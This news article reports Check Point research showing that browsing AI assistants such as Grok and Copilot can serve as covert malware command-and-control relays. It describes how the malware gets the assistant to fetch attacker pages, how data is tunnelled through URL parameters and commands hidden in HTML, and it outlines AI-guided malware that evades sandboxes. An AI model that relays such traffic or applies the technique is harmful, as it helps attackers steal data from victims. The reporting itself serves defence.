AI assistants with web browsing features can be repurposed as covert command-and-control (C2) channels, allowing malicious traffic to blend into routine enterprise communications.
According to new findings from Check Point Research (CPR), platforms including Grok and Microsoft Copilot can be manipulated through their public web interfaces to fetch attacker-controlled URLs and return responses.
In effect, the AI service acts as a proxy, relaying commands to infected machines and sending stolen data back out, without requiring an API key or even a registered account.
This approach shifts AI from a development aid for attackers into an operational component of malware itself.
How The Proxy Technique Works
The method relies on AI assistants that support URL fetching and content summarization. By prompting the assistant to visit a malicious website and summarise its contents, attackers can tunnel encoded data through query parameters and receive embedded commands in the AI's reply.
In a proof-of-concept (PoC), the CPR team set up a benign-looking website and instructed the AI to retrieve specific information from it. The returned output contained commands planted in the site's HTML, which malware could then parse and execute.
To automate the process, the researchers used a WebView2 browser component inside a C++ program, enabling malware to interact with the AI interface invisibly.
The implant gathered basic system data, appended it to a URL and asked the AI to summarise the page. The AI's response delivered instructions back to the infected host.
Key characteristics of the technique include:
-
No authentication or API key required
-
Encrypted or encoded data to bypass safeguards
-
Traffic disguised as legitimate AI web usage
Toward Adaptive AI-Driven Malware
The research also outlined a broader trend: malware that integrates AI into its runtime decision-making. Rather than relying on fixed logic, an implant could send host information to a model and receive guidance on what actions to prioritise, whether to proceed or remain dormant and which files to target.
Such AI-driven campaigns could refine reconnaissance, avoid sandbox environments and selectively encrypt or exfiltrate high-value data, reducing noise and limiting detection. Instead of encrypting 100 GB of files, for example, attackers might focus only on critical assets, shortening execution time to minutes or less.
CPR argued that AI-enabled web features pose a service-abuse risk rather than a software flaw.
"As AI continues to integrate into everyday workflows, it will also integrate into attacker workflows," the researchers said.
"Understanding how these systems can be misused today is the first step toward hardening them for the future, and ensuring that AI remains more useful to defenders than to the malware that tries to hide behind it."